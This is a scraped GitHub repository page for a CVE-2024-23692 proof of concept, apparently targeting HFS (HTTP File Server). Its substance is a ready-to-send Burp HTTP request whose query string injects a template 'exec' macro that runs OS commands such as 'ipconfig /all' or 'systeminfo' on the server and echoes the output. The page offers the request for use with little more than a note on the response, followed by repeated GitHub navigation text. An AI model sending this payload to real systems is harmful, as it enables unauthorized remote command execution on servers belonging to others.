CVE-2024-23692

BURP POC

GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1

Host: xxxx

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: close

Cookie: HFS_SID_=0.344328237697482

Upgrade-Insecure-Requests: 1

=========================================================

COMMAND=systeminfo

You can see that the echo message is around 100 lines of RAW Response

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
CVE-2024-23692.py		CVE-2024-23692.py
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-23692

About

Releases

Packages

Languages

k3lpi3b4nsh33/CVE-2024-23692

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-23692

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages